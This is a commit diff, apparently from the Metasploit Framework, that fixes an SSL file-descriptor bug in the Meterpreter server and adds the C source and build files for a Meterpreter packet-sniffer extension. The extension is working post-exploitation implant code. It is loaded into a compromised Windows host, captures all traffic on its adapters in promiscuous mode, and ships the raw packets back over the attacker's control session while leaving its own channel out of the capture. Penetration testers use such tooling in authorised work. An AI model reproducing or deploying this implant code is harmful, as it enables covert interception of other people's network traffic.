Fixes a memory corruption issue with the SSL file descriptor (was using a stack reference instead of the Remote->fd reference), adds the source code sans the Packet SDK for the sniffer module

git-svn-id: file:///home/svn/framework3/trunk@6763 4d416f70-5f16-0410-b530-b9f4589650da

external/source/meterpreter/source/common/common.h

@@ -25,10 +25,6 @@
 #include "channel.h"
 #include "scheduler.h"
 
-
-
-
-
 #ifdef DEBUGTRACE
 #define dprintf(...) real_dprintf(__VA_ARGS__)
 #else

external/source/meterpreter/source/common/core.c

@@ -711,7 +711,9 @@ DWORD packet_transmit(Remote *remote, Packet *packet,
 			while( (res = ssl_write(
 						&remote->ssl, 
 						(LPCSTR)(&packet->header) + idx, 
-						sizeof(packet->header) - idx)) == POLARSSL_ERR_NET_TRY_AGAIN) { }
+						sizeof(packet->header) - idx)) == POLARSSL_ERR_NET_TRY_AGAIN) { 
+				dprintf("resending SSL header data on blocked socket");
+			}
 			if(res < 0) {
 				dprintf("transmit header failed with return %d at index %d\n", res, idx);
 				break;
@@ -726,7 +728,9 @@ DWORD packet_transmit(Remote *remote, Packet *packet,
 			while( (res = ssl_write(
 						&remote->ssl, 
 						packet->payload + idx,
-						packet->payloadLength - idx)) == POLARSSL_ERR_NET_TRY_AGAIN) { }
+						packet->payloadLength - idx)) == POLARSSL_ERR_NET_TRY_AGAIN) { 
+				dprintf("resending SSL payload data on blocked socket");
+			}
 			
 			idx += res;
 		}

external/source/meterpreter/source/extensions/sniffer/sniffer.c

@@ -0,0 +1,548 @@
+/*
+ * This module implements packet sniffing features 
+ */
+#define _CRT_SECURE_NO_DEPRECATE 1
+#include "../../common/common.h"
+
+#include "sniffer.h"
+
+#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
+// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
+// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the 
+// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
+#include "../../ReflectiveDLLInjection/ReflectiveLoader.c"
+
+// this sets the delay load hook function, see DelayLoadMetSrv.h
+EnableDelayLoadMetSrv();
+
+HANDLE hMgr;
+DWORD hErr;
+
+struct sockaddr peername;
+int peername_len;
+
+struct sockaddr_in *peername4;
+struct sockaddr_in6 *peername6;
+
+int sniffer_includeports[1024];
+int sniffer_excludeports[1024];
+
+CRITICAL_SECTION sniffercs;
+
+#define SNIFFER_MAX_INTERFACES 128
+#define SNIFFER_MAX_QUEUE  210000 // ~300Mb @ 1514 bytes
+
+CaptureJob open_captures[SNIFFER_MAX_INTERFACES];
+
+DWORD request_sniffer_interfaces(Remote *remote, Packet *packet);
+DWORD request_sniffer_capture_start(Remote *remote, Packet *packet);
+DWORD request_sniffer_capture_stop(Remote *remote, Packet *packet);
+DWORD request_sniffer_capture_stats(Remote *remote, Packet *packet);
+DWORD request_sniffer_capture_dump(Remote *remote, Packet *packet);
+HANDLE pktsdk_interface_by_index(unsigned int fidx);
+DWORD pktsdk_initialize(void);
+
+void __stdcall sniffer_queue_receive(DWORD_PTR Param, DWORD_PTR ThParam, HANDLE hPacket, LPVOID pPacketData, DWORD IncPacketSize);
+
+
+#define check_pssdk(); if(!hMgr && pktsdk_initialize()!=0){packet_transmit_response(hErr, remote, response);return(hErr);}
+
+DWORD pktsdk_initialize(void) {
+	hMgr = MgrCreate();
+	if(! hMgr){
+		dprintf("sniffer>> failed to allocate a new Mgr object");
+		hErr = ERROR_ACCESS_DENIED;
+		return(hErr);
+	}
+	
+	hErr = MgrInitialize(hMgr);
+	dprintf("sniffer>> Mgr object initialized with return %d (handle %d)", hErr, hMgr);
+	return hErr;
+}
+
+HANDLE pktsdk_interface_by_index(unsigned int fidx) {
+	unsigned idx = 1;
+	HANDLE hCfg;
+	
+	dprintf("sniffer>> pktsdk_interface_by_index(%d)", fidx);
+
+	hCfg = MgrGetFirstAdapterCfg(hMgr);
+	do {
+		if(fidx == idx++) return hCfg;
+	}while((hCfg = MgrGetNextAdapterCfg(hMgr,hCfg)) != NULL);
+	return NULL;
+}
+
+
+DWORD request_sniffer_interfaces(Remote *remote, Packet *packet)
+{
+	Packet *response = packet_create_response(packet);
+	Tlv entries[8];
+
+	/*
+		0: Index
+		1: Name
+		2: Description
+		3: Type
+		4: MTU
+		5: Wireless?
+		6: Accessible?
+		7: DHCP?
+	*/
+	unsigned int idx = 1;
+	HANDLE hCfg;
+	
+	check_pssdk();
+
+	hCfg = MgrGetFirstAdapterCfg(hMgr);
+
+	do
+	{
+		unsigned char *aname = (unsigned char *)AdpCfgGetAdapterNameA(hCfg);
+		unsigned char *adesc = (unsigned char *)AdpCfgGetAdapterDescriptionA(hCfg);
+		unsigned int ahand = htonl((unsigned int)hCfg); 
+		unsigned int atype = htonl(AdpCfgGetAdapterType(hCfg));
+		unsigned int amtu  = htonl(AdpCfgGetMaxPacketSize(hCfg));
+		unsigned int aidx  = htonl(idx);
+
+		BOOL awireless = AdpCfgIsWireless(hCfg);
+		BOOL ausable   = AdpCfgGetAccessibleState(hCfg);
+		BOOL adhcp     = AdpCfgGetDhcpState(hCfg);
+
+		memset(entries, 0, sizeof(entries));
+
+		dprintf("sniffer>> interface %d - %s - %s", idx, aname, adesc);
+
+		entries[0].header.type   = TLV_TYPE_UINT;
+		entries[0].header.length = sizeof(unsigned int);
+		entries[0].buffer        = (PUCHAR)&aidx;
+
+		entries[1].header.type   = TLV_TYPE_STRING;
+		entries[1].header.length = strlen(aname)+1;
+		entries[1].buffer        = aname;
+
+		entries[2].header.type   = TLV_TYPE_STRING;
+		entries[2].header.length = strlen(adesc)+1;
+		entries[2].buffer        = adesc;
+
+		entries[3].header.type   = TLV_TYPE_UINT;
+		entries[3].header.length = sizeof(unsigned int);
+		entries[3].buffer        = (PUCHAR)&atype;
+
+		entries[4].header.type   = TLV_TYPE_UINT;
+		entries[4].header.length = sizeof(unsigned int);
+		entries[4].buffer        = (PUCHAR)&amtu;
+
+		entries[5].header.type   = TLV_TYPE_BOOL;
+		entries[5].header.length = sizeof(BOOL);
+		entries[5].buffer        = (PUCHAR)&awireless;
+
+		entries[6].header.type   = TLV_TYPE_BOOL;
+		entries[6].header.length = sizeof(BOOL);
+		entries[6].buffer        = (PUCHAR)&ausable;
+
+		entries[7].header.type   = TLV_TYPE_BOOL;
+		entries[7].header.length = sizeof(BOOL);
+		entries[7].buffer        = (PUCHAR)&adhcp;
+
+		packet_add_tlv_group(response, TLV_TYPE_SNIFFER_INTERFACES, entries, 8);
+
+		idx++;
+	}while((hCfg = MgrGetNextAdapterCfg(hMgr,hCfg)) != NULL);
+
+	packet_transmit_response(ERROR_SUCCESS, remote, response);
+	return ERROR_SUCCESS;
+}
+
+
+
+void __stdcall sniffer_receive(DWORD_PTR Param, DWORD_PTR ThParam, HANDLE hPacket, LPVOID pPacketData, DWORD IncPacketSize) {
+	CaptureJob *j;
+	HANDLE pkt;
+	unsigned char *pktbuf;
+	unsigned char *pktmax;
+	ETHERNET_HEADER *eth;
+	IP_HEADER *ip;
+	TCP_HEADER *tcp;
+	UDP_HEADER *udp;
+
+
+	j = (CaptureJob *)Param;
+	pktbuf = (unsigned char *)pPacketData;
+	pktmax = pktbuf + IncPacketSize;
+
+
+	// Only process active jobs
+	if(!j->active) return;
+
+	// Traffic filtering goes here
+	do {
+		// Skip matching on short packets
+		if(IncPacketSize < sizeof(ETHERNET_HEADER)+sizeof(IP_HEADER)+sizeof(TCP_HEADER)){
+			dprintf("sniffer>> skipping exclusion because the packet is too small");	
+		}
+
+		// Match IP packets
+		if(! peername4)  {
+			dprintf("sniffer>> skipping exclusion because peername4 is not defined");
+			break;
+		}
+
+		// Skip non-IP packets
+		eth = (ETHERNET_HEADER *) pktbuf;
+		if(ntohs(eth->EthType) != ETHERTYPE_IP) {
+			dprintf("sniffer>> skipping non-IP packet from filter");
+			break;
+		}
+
+		// Skip non-TCP/UDP packets
+		ip = (IP_HEADER *)&pktbuf[sizeof(ETHERNET_HEADER)];
+		if(ip->Protocol != IPPROTO_TCP && ip->Protocol != IPPROTO_UDP) {
+			dprintf("sniffer>> skipping non-TCP/UDP packet from filter: %d", ip->Protocol);
+			break;
+		}
+
+		if(ip->Protocol == IPPROTO_TCP) {
+			tcp = (TCP_HEADER *)&pktbuf[sizeof(ETHERNET_HEADER) + (ip->Len * 4)];
+			if( (unsigned char *)tcp + sizeof(TCP_HEADER) > pktmax) {
+				dprintf("sniffer>> TCP packet is too short");
+				break;
+			}
+			
+			// Ignore our own control session's traffic
+			if ( (memcmp(&ip->SrcAddr,  &peername4->sin_addr, 4) == 0 && tcp->Sport == peername4->sin_port) ||
+				 (memcmp(&ip->DestAddr, &peername4->sin_addr, 4) == 0 && tcp->Dport == peername4->sin_port) ) {
+				return;
+			}
+			// TODO: Scan through a list of included/excluded ports
+		}
+
+		// All done matching exclusions
+	} while(0);
+
+
+	// Thread-synchronized access to the queue
+	EnterCriticalSection(&sniffercs);
+
+	if(j->idx_pkts >= j->max_pkts) j->idx_pkts = 0;
+	j->cur_pkts++;
+	j->cur_bytes += IncPacketSize;
+	
+	pkt = PktCreate(j->mtu);
+	PktCopyPacketToPacket(pkt, hPacket);
+	if(j->pkts[j->idx_pkts])
+			PktDestroy(j->pkts[j->idx_pkts]);
+	j->pkts[j->idx_pkts] = pkt;
+	j->idx_pkts++;
+
+	LeaveCriticalSection(&sniffercs);
+}
+
+DWORD request_sniffer_capture_start(Remote *remote, Packet *packet) {
+	Packet *response = packet_create_response(packet);
+	unsigned int ifid;
+	unsigned int maxp;
+	CaptureJob *j;
+	DWORD result;
+	HANDLE ifh;
+
+	check_pssdk();
+	dprintf("sniffer>> start_capture()");
+
+	ifid = packet_get_tlv_value_uint(packet,TLV_TYPE_SNIFFER_INTERFACE_ID);
+	maxp = packet_get_tlv_value_uint(packet,TLV_TYPE_SNIFFER_PACKET_COUNT);
+	maxp = min(maxp, 200000);
+	maxp = max(maxp, 1);
+
+	result = ERROR_SUCCESS;
+
+	do {
+		// the interface is invalid
+		if(ifid == 0 || ifid >= SNIFFER_MAX_INTERFACES) {
+			result = ERROR_INVALID_PARAMETER;
+			break;
+		}
+
+		ifh = pktsdk_interface_by_index(ifid);
+		if(ifh == NULL) {
+			result = ERROR_INVALID_PARAMETER;
+			break;		
+		}
+
+		j = &open_captures[ifid];
+
+		// the interface is already being captured
+		if(j->active) {
+			result = ERROR_INVALID_PARAMETER;
+			break;
+		}
+
+		j->adp = AdpCreate();
+		dprintf("sniffer>> capture_start() AdpCreate: 0x%.8x", j->adp);
+
+		AdpSetConfig(j->adp,ifh);
+		hErr = AdpOpenAdapter(j->adp);
+		dprintf("sniffer>> capture_start() AdpOpenAdapter: 0x%.8x", hErr);
+		if (hErr != HNERR_OK) { 
+			AdpDestroy(j->adp);
+			result = hErr;
+			break;
+		}
+		
+		j->pkts = calloc(maxp, sizeof(HANDLE));
+		if(j->pkts == NULL) {
+			AdpCloseAdapter(j->adp);
+			AdpDestroy(j->adp);
+			result = ERROR_ACCESS_DENIED;
+			break;
+		}
+
+		j->active   = 1;
+		j->intf     = ifid;
+		j->max_pkts = maxp;
+		j->cur_pkts = 0;
+		j->mtu      = AdpCfgGetMaxPacketSize(AdpGetConfig(j->adp));
+
+		AdpSetOnPacketRecv(j->adp, (FARPROC) sniffer_receive, (DWORD_PTR)j);
+		AdpSetMacFilter(j->adp, mfAll);
+	} while(0);
+	
+	packet_transmit_response(result, remote, response);
+	return ERROR_SUCCESS;
+}
+
+DWORD request_sniffer_capture_stop(Remote *remote, Packet *packet) {
+	Packet *response = packet_create_response(packet);
+	unsigned int ifid;
+	CaptureJob *j;
+	DWORD result;
+
+	check_pssdk();
+	dprintf("sniffer>> stop_capture()");
+
+	ifid = packet_get_tlv_value_uint(packet,TLV_TYPE_SNIFFER_INTERFACE_ID);
+	dprintf("sniffer>> stop_capture(0x%.8x)", ifid);
+
+	result = ERROR_SUCCESS;
+
+	do {
+		// the interface is invalid
+		if(ifid == 0 || ifid >= SNIFFER_MAX_INTERFACES) {
+			result = ERROR_INVALID_PARAMETER;
+			break;
+		}
+		
+		j = &open_captures[ifid];
+
+		// the interface is not being captured
+		if(! j->adp) {
+			result = ERROR_INVALID_PARAMETER;
+			break;
+		}
+
+		j->active = 0;
+		AdpCloseAdapter(j->adp);
+		AdpDestroy(j->adp);
+		free(j->pkts);
+		memset(j, 0, sizeof(CaptureJob));
+
+		dprintf("sniffer>> stop_capture() interface %d processed %d packets/%d bytes", j->intf, j->cur_pkts, j->cur_bytes); 
+	} while(0);
+	
+	packet_transmit_response(result, remote, response);
+	return ERROR_SUCCESS;
+}
+
+
+
+DWORD request_sniffer_capture_stats(Remote *remote, Packet *packet) {
+	Packet *response = packet_create_response(packet);
+	unsigned int ifid;
+	CaptureJob *j;
+	DWORD result;
+
+	check_pssdk();
+	dprintf("sniffer>> capture_stats()");
+
+	ifid = packet_get_tlv_value_uint(packet,TLV_TYPE_SNIFFER_INTERFACE_ID);
+	dprintf("sniffer>> capture_stats(0x%.8x)", ifid);
+
+	result = ERROR_SUCCESS;
+
+	do {
+		// the interface is invalid
+		if(ifid == 0 || ifid >= SNIFFER_MAX_INTERFACES) {
+			result = ERROR_INVALID_PARAMETER;
+			break;
+		}
+		
+		j = &open_captures[ifid];
+
+		// the interface was not captured
+		if(! j->adp) {
+			result = ERROR_INVALID_PARAMETER;
+			break;
+		}
+
+		packet_add_tlv_uint(response, TLV_TYPE_SNIFFER_PACKET_COUNT, j->cur_pkts);
+		packet_add_tlv_uint(response, TLV_TYPE_SNIFFER_BYTE_COUNT, (unsigned int) j->cur_bytes);
+	} while(0);
+	
+	packet_transmit_response(result, remote, response);
+	return ERROR_SUCCESS;
+}
+
+
+DWORD request_sniffer_capture_dump(Remote *remote, Packet *packet) {
+	Packet *response = packet_create_response(packet);
+	unsigned int ifid;
+	CaptureJob *j;
+	DWORD result,pcnt,bcnt,rcnt,i;
+	DWORD thi, tlo;
+
+	check_pssdk();
+	dprintf("sniffer>> capture_dump()");
+
+	ifid = packet_get_tlv_value_uint(packet,TLV_TYPE_SNIFFER_INTERFACE_ID);
+	dprintf("sniffer>> capture_dump(0x%.8x)", ifid);
+
+	result = ERROR_SUCCESS;
+
+	do {
+		// the interface is invalid
+		if(ifid == 0 || ifid >= SNIFFER_MAX_INTERFACES) {
+			result = ERROR_INVALID_PARAMETER;
+			break;
+		}
+		
+		j = &open_captures[ifid];
+
+		// the interface was not captured
+		if(! j->adp) {
+			result = ERROR_INVALID_PARAMETER;
+			break;
+		}
+
+		EnterCriticalSection(&sniffercs);
+
+		bcnt = j->cur_bytes;
+		pcnt = j->cur_pkts;
+		rcnt = 0;
+
+		packet_add_tlv_uint(response, TLV_TYPE_SNIFFER_PACKET_COUNT, pcnt);
+		packet_add_tlv_uint(response, TLV_TYPE_SNIFFER_BYTE_COUNT, bcnt);
+
+		for(i=0; i<j->max_pkts; i++) {
+			if(!j->pkts[i]) break;
+			tlo = PktGetTimeStamp(j->pkts[i], &thi);
+			packet_add_tlv_uint(response, TLV_TYPE_UINT, PktGetId(j->pkts[i], NULL));
+			packet_add_tlv_uint(response, TLV_TYPE_UINT, thi);
+			packet_add_tlv_uint(response, TLV_TYPE_UINT, tlo);
+			packet_add_tlv_raw(
+				response, 
+				TLV_TYPE_SNIFFER_PACKET, 
+				PktGetPacketData(j->pkts[i]),
+				PktGetPacketSize(j->pkts[i])
+			);
+			PktDestroy(j->pkts[i]);
+			j->pkts[i] = NULL;
+		}
+		dprintf("sniffer>> finished processing packets");
+
+		j->cur_bytes = 0;
+		j->cur_pkts  = 0;
+		j->idx_pkts  = 0;
+
+		LeaveCriticalSection(&sniffercs);
+
+	} while(0);
+	
+	packet_transmit_response(result, remote, response);
+	return ERROR_SUCCESS;
+}
+
+Command customCommands[] =
+{
+	// List interfaces
+	{ "sniffer_interfaces",
+	  { request_sniffer_interfaces,                          { 0 }, 0 },
+	  { EMPTY_DISPATCH_HANDLER                                        },
+	},
+	// Start sniffing
+	{ "sniffer_capture_start",
+	  { request_sniffer_capture_start,                       { 0 }, 0 },
+	  { EMPTY_DISPATCH_HANDLER                                        },
+	},
+	// Stop sniffing
+	{ "sniffer_capture_stop",
+	  { request_sniffer_capture_stop,                        { 0 }, 0 },
+	  { EMPTY_DISPATCH_HANDLER                                        },
+	},
+	// Sniffing stats
+	{ "sniffer_capture_stats",
+	  { request_sniffer_capture_stats,                       { 0 }, 0 },
+	  { EMPTY_DISPATCH_HANDLER                                        },
+	},
+	// Sniffing dump
+	{ "sniffer_capture_dump",
+	  { request_sniffer_capture_dump,                        { 0 }, 0 },
+	  { EMPTY_DISPATCH_HANDLER                                        },
+	},
+	// Terminator
+	{ NULL,
+	  { EMPTY_DISPATCH_HANDLER                      },
+	  { EMPTY_DISPATCH_HANDLER                      },
+	}
+};
+
+/*
+ * Initialize the server extension
+ */
+DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
+{
+	DWORD index;
+
+	hMetSrv = remote->hMetSrv;
+
+	for (index = 0;
+	     customCommands[index].method;
+	     index++)
+		command_register(&customCommands[index]);
+
+	// initialize structures for the packet sniffer sdk
+	hMgr = NULL;
+	hErr = 0;
+	memset(open_captures, 0, sizeof(open_captures));
+
+	// wipe the include/exclude ports empty
+	memset(sniffer_includeports, 0, sizeof(sniffer_includeports));
+	memset(sniffer_excludeports, 0, sizeof(sniffer_excludeports));
+	sniffer_includeports[0] = -1;
+	sniffer_excludeports[0] = -1;	
+	
+	// get the address/port of the connected control socket
+	peername4 = NULL;
+	peername6 = NULL;
+	peername_len = sizeof(peername);
+	getpeername(remote->fd, &peername, &peername_len);
+	if(peername.sa_family == PF_INET)  peername4 = (struct sockaddr_in *)&peername;
+	if(peername.sa_family == PF_INET6) peername6 = (struct sockaddr_in6 *)&peername;
+
+	InitializeCriticalSection(&sniffercs);
+	return hErr;
+}
+
+/*
+ * Deinitialize the server extension
+ */
+DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
+{
+	DWORD index;
+
+	for (index = 0;
+	     customCommands[index].method;
+	     index++)
+		command_deregister(&customCommands[index]);
+	MgrDestroy(hMgr);
+	return ERROR_SUCCESS;
+}

external/source/meterpreter/source/extensions/sniffer/sniffer.h

@@ -0,0 +1,85 @@
+#ifndef _METERPRETER_SOURCE_EXTENSION_SNIFFER_SNIFFER_H
+#define _METERPRETER_SOURCE_EXTENSION_SNIFFER_SNIFFER_H
+
+
+#include <winsock2.h>
+#include <ws2tcpip.h>
+
+#include "HNPsSdkUser.h"
+#include "ethernet.h"
+#include "ip.h"
+#include "tcp.h"
+#include "udp.h"
+
+
+typedef struct capturejob
+{
+	unsigned int active;
+	unsigned int intf;
+	unsigned int max_pkts;
+	unsigned int idx_pkts;
+	unsigned int cur_pkts;
+	unsigned int cur_bytes;
+	unsigned int mtu;
+	HANDLE adp;
+	HANDLE *pkts;
+} CaptureJob;
+
+#define TLV_TYPE_EXTENSION_SNIFFER	0
+
+
+#define TLV_TYPE_SNIFFER_INTERFACES	\
+		MAKE_CUSTOM_TLV(							\
+				TLV_META_TYPE_GROUP,				\
+				TLV_TYPE_EXTENSION_SNIFFER,		\
+				TLV_EXTENSIONS + 1)
+
+#define TLV_TYPE_SNIFFER_INTERFACE_ID	\
+		MAKE_CUSTOM_TLV(							\
+				TLV_META_TYPE_UINT,				\
+				TLV_TYPE_EXTENSION_SNIFFER,		\
+				TLV_EXTENSIONS + 2)
+
+#define TLV_TYPE_SNIFFER_INTERFACE_HANDLE	\
+		MAKE_CUSTOM_TLV(							\
+				TLV_META_TYPE_UINT,				\
+				TLV_TYPE_EXTENSION_SNIFFER,		\
+				TLV_EXTENSIONS + 3)
+
+#define TLV_TYPE_SNIFFER_PACKET_COUNT	\
+		MAKE_CUSTOM_TLV(							\
+				TLV_META_TYPE_UINT,				\
+				TLV_TYPE_EXTENSION_SNIFFER,		\
+				TLV_EXTENSIONS + 4)
+
+#define TLV_TYPE_SNIFFER_BYTE_COUNT	\
+		MAKE_CUSTOM_TLV(							\
+				TLV_META_TYPE_UINT,				\
+				TLV_TYPE_EXTENSION_SNIFFER,		\
+				TLV_EXTENSIONS + 5)
+
+#define TLV_TYPE_SNIFFER_EXCLUDE_PORTS	\
+		MAKE_CUSTOM_TLV(							\
+				TLV_META_TYPE_GROUP,				\
+				TLV_TYPE_EXTENSION_SNIFFER,		\
+				TLV_EXTENSIONS + 6)
+
+#define TLV_TYPE_SNIFFER_INCLUDE_PORTS	\
+		MAKE_CUSTOM_TLV(							\
+				TLV_META_TYPE_GROUP,				\
+				TLV_TYPE_EXTENSION_SNIFFER,		\
+				TLV_EXTENSIONS + 7)
+
+#define TLV_TYPE_SNIFFER_PACKETS	\
+		MAKE_CUSTOM_TLV(							\
+				TLV_META_TYPE_GROUP,				\
+				TLV_TYPE_EXTENSION_SNIFFER,		    \
+				TLV_EXTENSIONS + 8)
+
+#define TLV_TYPE_SNIFFER_PACKET	\
+		MAKE_CUSTOM_TLV(							\
+				TLV_META_TYPE_RAW,  				\
+				TLV_TYPE_EXTENSION_SNIFFER,	    	\
+				TLV_EXTENSIONS + 9)
+
+#endif

external/source/meterpreter/source/server/metsrv.c

@@ -38,7 +38,7 @@ DWORD __declspec(dllexport) Init(SOCKET fd)
 	if( hAppInstance == NULL )
 		hAppInstance = GetModuleHandle( NULL );
 
-	srand(time(NULL));
+	srand((unsigned int)time(NULL));
 
 	__try 
 	{
@@ -145,7 +145,7 @@ DWORD negotiate_ssl(Remote *remote)
     ssl_set_authmode( ssl, SSL_VERIFY_NONE );
 	ssl_set_dbg( ssl, ssl_debug_log, NULL);
     ssl_set_rng( ssl, havege_rand, &hs );
-    ssl_set_bio( ssl, net_recv, &fd, net_send, &fd );
+	ssl_set_bio( ssl, net_recv, &remote->fd, net_send, &remote->fd );
     ssl_set_ciphers( ssl, ssl_default_ciphers );
     ssl_set_session( ssl, 0, 0, ssn );
 

external/source/meterpreter/workspace/ext_server_sniffer/ext_server_sniffer.vcproj

@@ -0,0 +1,211 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="9.00"
+	Name="ext_server_sniffer"
+	ProjectGUID="{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}"
+	RootNamespace="ext_server_incognito"
+	Keyword="Win32Proj"
+	TargetFrameworkVersion="196613"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_INCOGNITO_EXPORTS"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="2"
+				UsePrecompiledHeader="0"
+				WarningLevel="3"
+				DebugInformationFormat="4"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalOptions="netapi32.lib mpr.lib"
+				LinkIncremental="2"
+				GenerateDebugInformation="true"
+				SubSystem="2"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory=".\Release"
+			IntermediateDirectory=".\Release"
+			ConfigurationType="2"
+			CharacterSet="2"
+			WholeProgramOptimization="0"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="1"
+				InlineFunctionExpansion="0"
+				EnableIntrinsicFunctions="false"
+				FavorSizeOrSpeed="2"
+				AdditionalIncludeDirectories="..\..\source\extensions\sniffer; .\pssdk"
+				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SNIFFER_EXPORTS"
+				StringPooling="true"
+				RuntimeLibrary="0"
+				EnableFunctionLevelLinking="true"
+				UsePrecompiledHeader="0"
+				AssemblerListingLocation=".\Release/"
+				ObjectFile=".\Release/"
+				ProgramDataBaseFileName=".\Release/"
+				WarningLevel="3"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalDependencies="Netapi32.lib Mpr.lib ws2_32.lib metsrv.lib .\pssdk\pssdk.lib"
+				OutputFile=".\Release/ext_server_sniffer.dll"
+				LinkIncremental="1"
+				AdditionalLibraryDirectories="..\metsrv\Release;.\pssdk\"
+				GenerateManifest="false"
+				DelayLoadDLLs="metsrv.dll"
+				GenerateDebugInformation="false"
+				GenerateMapFile="true"
+				MapFileName=".\Release/ext_server_sniffer.map"
+				SubSystem="0"
+				OptimizeReferences="0"
+				EnableCOMDATFolding="0"
+				RandomizedBaseAddress="1"
+				DataExecutionPrevention="0"
+				ImportLibrary=".\Release/ext_server_sniffer.lib"
+				TargetMachine="1"
+				Profile="false"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+				CommandLine="copy /y &quot;$(ProjectDir)\release\*.dll&quot; &quot;$(ProjectDir)..\..\output\&quot;"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath="..\..\source\extensions\sniffer\sniffer.c"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+			<File
+				RelativePath="..\..\source\extensions\sniffer\sniffer.h"
+				>
+			</File>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>

external/source/meterpreter/workspace/meterpreter.sln

@@ -50,6 +50,12 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_espia", "ext_ser
 		{37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
 	EndProjectSection
 EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_sniffer", "ext_server_sniffer\ext_server_sniffer.vcproj", "{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}"
+	ProjectSection(ProjectDependencies) = postProject
+		{72F0246A-A38D-4547-9057-46020E8E503D} = {72F0246A-A38D-4547-9057-46020E8E503D}
+		{37E24F8F-1BD9-490B-8CD2-4768B89E5EAB} = {37E24F8F-1BD9-490B-8CD2-4768B89E5EAB}
+	EndProjectSection
+EndProject
 Global
 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 		Debug|Win32 = Debug|Win32
@@ -92,6 +98,10 @@ Global
 		{CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Debug|Win32.Build.0 = Debug|Win32
 		{CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|Win32.ActiveCfg = Release|Win32
 		{CF56DDCC-505F-4D5C-AC2E-9787C7EF1504}.Release|Win32.Build.0 = Release|Win32
+		{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Debug|Win32.ActiveCfg = Debug|Win32
+		{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Debug|Win32.Build.0 = Debug|Win32
+		{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Release|Win32.ActiveCfg = Release|Win32
+		{BF0C0D6E-9119-4518-A3BC-2CF99C0E27D9}.Release|Win32.Build.0 = Release|Win32
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE